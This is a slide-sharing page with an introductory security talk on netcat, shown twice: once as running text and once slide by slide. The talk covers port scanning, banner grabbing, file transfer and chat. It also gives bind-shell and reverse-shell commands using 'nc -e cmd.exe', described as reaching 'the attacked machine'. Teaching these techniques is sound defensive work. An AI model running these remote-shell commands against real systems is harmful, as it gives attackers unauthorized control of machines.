- - by Mahesh Bheema
 It is a tool that can read and write data across
networks, usingTCP or UDP protocol. It can
be operated both in server and client mode.
 Port scanning
 Banner Grabbing
 Backdoor
 File transfer
 Port Redirector
 Chatting and
 Many more…
 Port scanning is the process of scanning a
specified host and looking for ports that may
be open or closed.
 Here is the syntax to scan ports…
# nc -v -z IP_Address port_range
-v is for verbosity (without –v it wont display result in output)
 Banner grabbing is a technique to determine
the service running or application, version,
operating system. Using the below syntax :
# nc -v IP_Address port
 when you hit enter,After a few seconds you
see some information about your IP address
and port number, then write GET / HTTP/1.1
and hit enter and see some information about
your victim.
 File transfer/ chat works by setting up a
server and client.
 FileTransfer
 nc –l –p 1234 > testfile.txt [Reciever’s end]
 nc IP_Address 1234 < testfile.txt [Sender’s end]
 type abc.jpeg | nc –lvp 8080
 nc –l Server_IP 8080 > abc.jpeg
 Chat Server
 nc –l –p 1234 [Reciever’s end]
 nc IP_Address 1234 [Sender’s end]
 Netcat has the ability of providing a remote
shell as well. We can do this in two ways…
 1. Bind Shell
 2. Reverse Shell
 We can take cmd.exe/shell and bind it to a
local port, and anyone connecting to this port
will be presented with command prompt
belonging to that machine.This is known as a
BIND SHELL. Syntax as follows…
 # nc –l -p 1337 –e cmd.exe [Server]
 # nc –v Server_IP 1337 [Client]
 Reverse Shell:
 Netcat can also "send" a shell to another
instance of a listening Netcat session.This is
especially useful if the attacked machine is
behind a firewall or otherwise nat'ed
 # nc –lvp 1337 [Server]
 # nc –v Server_IP 1337 –e cmd.exe [Client]
 It's not always the best tool for the job, but if I
was stranded on an island, I'd take Netcat
with me ☺
 SpecialThanks to CATechnologies for the
venue.

More Related Content

PPTX
Netcat - A Swiss Army Tool
PPTX
PDF
Netcat 101 by-mahesh-beema
PDF
Ch 5: Port Scanning
PDF
Netcat cheat sheet_v1
PPTX
TELNET and SSH by MUSTAFA SAKHAI
Netcat - A Swiss Army Tool
Netcat 101 by-mahesh-beema
Ch 5: Port Scanning
Netcat cheat sheet_v1
TELNET and SSH by MUSTAFA SAKHAI

What's hot (20)

PPTX
Ports and services
PPTX
Tcpdump
PPTX
Reverse shell
PPTX
PPT
Bh usa-01-kaminsky
PDF
CNIT 50: 6. Command Line Packet Analysis Tools
PPTX
Telnet & SSH Configuration
PPT
Module 3 Scanning
PDF
Introduction to tcpdump
PPTX
Responder PPT
PDF
Share File easily between computers using sftp
PDF
Network telnet ssh
PPT
Port Scanning
PPT
Nmap(network mapping)
PPT
Secure shell ppt
PDF
Introduction to eBPF
PDF
Linux Networking Explained
DOCX
Type of DDoS attacks with hping3 example
PPTX
Wireshark
PPTX
04 18-2018--netcat port-80_blue
Ports and services
Tcpdump
Reverse shell
Bh usa-01-kaminsky
CNIT 50: 6. Command Line Packet Analysis Tools
Telnet & SSH Configuration
Module 3 Scanning
Introduction to tcpdump
Responder PPT
Share File easily between computers using sftp
Network telnet ssh
Port Scanning
Nmap(network mapping)
Secure shell ppt
Introduction to eBPF
Linux Networking Explained
Type of DDoS attacks with hping3 example
Wireshark
04 18-2018--netcat port-80_blue
Ad

Viewers also liked (20)

PDF
Western new england university brochure 2
DOCX
formato 1
PDF
Forskningskommunikasjon i tradisjonelle og sosiale medier universitetet i sta...
PDF
Regulamento Bom pra tudo
DOC
Mentes Em Liberdade
PPT
M1 PPT
PDF
Workshop Agile userchecks
PDF
جاذبه های گردشگری چابهار - Chabahar Tourist attractions
PDF
Recorrido Dakar 2015
PPTX
Final digital marketing strategy
PPT
Los Chonos
PDF
1 час
PPT
Ecologically Safe Monotheistic Solutions to Global Crisis Of The Finance System
PDF
InsideSales Overview 2016
PDF
Sistemas operativos
DOCX
Dx bumil
PDF
Organic Vegetable Gardening ~ University of Tennessee
Western new england university brochure 2
formato 1
Forskningskommunikasjon i tradisjonelle og sosiale medier universitetet i sta...
Regulamento Bom pra tudo
Mentes Em Liberdade
M1 PPT
Workshop Agile userchecks
جاذبه های گردشگری چابهار - Chabahar Tourist attractions
Recorrido Dakar 2015
Final digital marketing strategy
Los Chonos
1 час
Ecologically Safe Monotheistic Solutions to Global Crisis Of The Finance System
InsideSales Overview 2016
Sistemas operativos
Dx bumil
Organic Vegetable Gardening ~ University of Tennessee
Ad

Similar to Netcat - 101 Swiss Army Knife (20)

PPTX
Netcat Windowschatting and backdoor 1.pptx
PPT
8c21da14 1c9c-44ee-8e24-9a1ddd64ca82-150211062639-conversion-gate02
PDF
Information Theft: Wireless Router Shareport for Phun and profit - Hero Suhar...
PPTX
F5 tcpdump
PDF
Figure 3 TCP Session Hijacking Attack victims to execute the mali.pdf
PPTX
Recon with Nmap
PPTX
Null Delhi chapter - Feb 2019
PDF
An Express Guide ~ SNMP for Secure Rremote Resource Monitoring
PPTX
06- 1 Active Information Gathering part 1.pptx
PDF
Nagios Conference 2011 - Mike Weber - Training: Choosing Nagios Plugins To Use
PPTX
Hunting for APT in network logs workshop presentation
PDF
Cheatsheet: Netcat
PDF
Netcat cheat sheet
PDF
FreeBSD and Hardening Web Server
PDF
From Kernel Space to User Heaven #NDH2k13
PDF
26.1.7 lab snort and firewall rules
PDF
Pycon - Python for ethical hackers
PDF
The Art of Grey-Box Attack
PPT
Client server
PDF
Hack The Box Nest 10.10.10.178
Netcat Windowschatting and backdoor 1.pptx
8c21da14 1c9c-44ee-8e24-9a1ddd64ca82-150211062639-conversion-gate02
Information Theft: Wireless Router Shareport for Phun and profit - Hero Suhar...
F5 tcpdump
Figure 3 TCP Session Hijacking Attack victims to execute the mali.pdf
Recon with Nmap
Null Delhi chapter - Feb 2019
An Express Guide ~ SNMP for Secure Rremote Resource Monitoring
06- 1 Active Information Gathering part 1.pptx
Nagios Conference 2011 - Mike Weber - Training: Choosing Nagios Plugins To Use
Hunting for APT in network logs workshop presentation
Cheatsheet: Netcat
Netcat cheat sheet
FreeBSD and Hardening Web Server
From Kernel Space to User Heaven #NDH2k13
26.1.7 lab snort and firewall rules
Pycon - Python for ethical hackers
The Art of Grey-Box Attack
Client server
Hack The Box Nest 10.10.10.178

More from n|u - The Open Security Community (20)

PDF
Hardware security testing 101 (Null - Delhi Chapter)
PPTX
SSRF exploit the trust relationship
PDF
PDF
Api security-testing
PDF
Introduction to TLS 1.3
PDF
Gibson 101 -quick_introduction_to_hacking_mainframes_in_2020_null_infosec_gir...
PDF
Talking About SSRF,CRLF
PPTX
Building active directory lab for red teaming
PPTX
Owning a company through their logs
PPTX
Introduction to shodan
PDF
Detecting persistence in windows
PPTX
Frida - Objection Tool Usage
PDF
OSQuery - Monitoring System Process
PDF
DevSecOps Jenkins Pipeline -Security
PDF
Extensible markup language attacks
PPTX
PDF
Hardware security testing 101 (Null - Delhi Chapter)
SSRF exploit the trust relationship
Api security-testing
Introduction to TLS 1.3
Gibson 101 -quick_introduction_to_hacking_mainframes_in_2020_null_infosec_gir...
Talking About SSRF,CRLF
Building active directory lab for red teaming
Owning a company through their logs
Introduction to shodan
Detecting persistence in windows
Frida - Objection Tool Usage
OSQuery - Monitoring System Process
DevSecOps Jenkins Pipeline -Security
Extensible markup language attacks

Recently uploaded (20)

PPTX
Virtual and Augmented Reality in Current Scenario
PDF
ChatGPT for Dummies - Pam Baker Ccesa007.pdf
PPTX
ELIAS-SEZIURE AND EPilepsy semmioan session.pptx
PPTX
20th Century Theater, Methods, History.pptx
PPTX
Chinmaya Tiranga Azadi Quiz (Class 7-8 )
PDF
International_Financial_Reporting_Standa.pdf
PDF
LDMMIA Reiki Yoga Finals Review Spring Summer
PPTX
History, Philosophy and sociology of education (1).pptx
PDF
CISA (Certified Information Systems Auditor) Domain-Wise Summary.pdf
PDF
FORM 1 BIOLOGY MIND MAPS and their schemes
PDF
OBE - B.A.(HON'S) IN INTERIOR ARCHITECTURE -Ar.MOHIUDDIN.pdf
PDF
advance database management system book.pdf
PDF
1.3 FINAL REVISED K-10 PE and Health CG 2023 Grades 4-10 (1).pdf
PDF
احياء السادس العلمي - الفصل الثالث (التكاثر) منهج متميزين/كلية بغداد/موهوبين
PDF
Hazard Identification & Risk Assessment .pdf
DOCX
Cambridge-Practice-Tests-for-IELTS-12.docx
PDF
David L Page_DCI Research Study Journey_how Methodology can inform one's prac...
PPTX
Onco Emergencies - Spinal cord compression Superior vena cava syndrome Febr...
PPTX
B.Sc. DS Unit 2 Software Engineering.pptx
PPTX
Share_Module_2_Power_conflict_and_negotiation.pptx
Virtual and Augmented Reality in Current Scenario
ChatGPT for Dummies - Pam Baker Ccesa007.pdf
ELIAS-SEZIURE AND EPilepsy semmioan session.pptx
20th Century Theater, Methods, History.pptx
Chinmaya Tiranga Azadi Quiz (Class 7-8 )
International_Financial_Reporting_Standa.pdf
LDMMIA Reiki Yoga Finals Review Spring Summer
History, Philosophy and sociology of education (1).pptx
CISA (Certified Information Systems Auditor) Domain-Wise Summary.pdf
FORM 1 BIOLOGY MIND MAPS and their schemes
OBE - B.A.(HON'S) IN INTERIOR ARCHITECTURE -Ar.MOHIUDDIN.pdf
advance database management system book.pdf
1.3 FINAL REVISED K-10 PE and Health CG 2023 Grades 4-10 (1).pdf
احياء السادس العلمي - الفصل الثالث (التكاثر) منهج متميزين/كلية بغداد/موهوبين
Hazard Identification & Risk Assessment .pdf
Cambridge-Practice-Tests-for-IELTS-12.docx
David L Page_DCI Research Study Journey_how Methodology can inform one's prac...
Onco Emergencies - Spinal cord compression Superior vena cava syndrome Febr...
B.Sc. DS Unit 2 Software Engineering.pptx
Share_Module_2_Power_conflict_and_negotiation.pptx

Netcat - 101 Swiss Army Knife

  • 1. - - by Mahesh Bheema
  • 2.  It is a tool that can read and write data across networks, usingTCP or UDP protocol. It can be operated both in server and client mode.
  • 3.  Port scanning  Banner Grabbing  Backdoor  File transfer  Port Redirector  Chatting and  Many more…
  • 4.  Port scanning is the process of scanning a specified host and looking for ports that may be open or closed.  Here is the syntax to scan ports… # nc -v -z IP_Address port_range -v is for verbosity (without –v it wont display result in output)
  • 5.  Banner grabbing is a technique to determine the service running or application, version, operating system. Using the below syntax : # nc -v IP_Address port  when you hit enter,After a few seconds you see some information about your IP address and port number, then write GET / HTTP/1.1 and hit enter and see some information about your victim.
  • 6.  File transfer/ chat works by setting up a server and client.  FileTransfer  nc –l –p 1234 > testfile.txt [Reciever’s end]  nc IP_Address 1234 < testfile.txt [Sender’s end]  type abc.jpeg | nc –lvp 8080  nc –l Server_IP 8080 > abc.jpeg  Chat Server  nc –l –p 1234 [Reciever’s end]  nc IP_Address 1234 [Sender’s end]
  • 7.  Netcat has the ability of providing a remote shell as well. We can do this in two ways…  1. Bind Shell  2. Reverse Shell
  • 8.  We can take cmd.exe/shell and bind it to a local port, and anyone connecting to this port will be presented with command prompt belonging to that machine.This is known as a BIND SHELL. Syntax as follows…  # nc –l -p 1337 –e cmd.exe [Server]  # nc –v Server_IP 1337 [Client]
  • 9.  Reverse Shell:  Netcat can also "send" a shell to another instance of a listening Netcat session.This is especially useful if the attacked machine is behind a firewall or otherwise nat'ed  # nc –lvp 1337 [Server]  # nc –v Server_IP 1337 –e cmd.exe [Client]
  • 10.  It's not always the best tool for the job, but if I was stranded on an island, I'd take Netcat with me ☺
  • 11.  SpecialThanks to CATechnologies for the venue.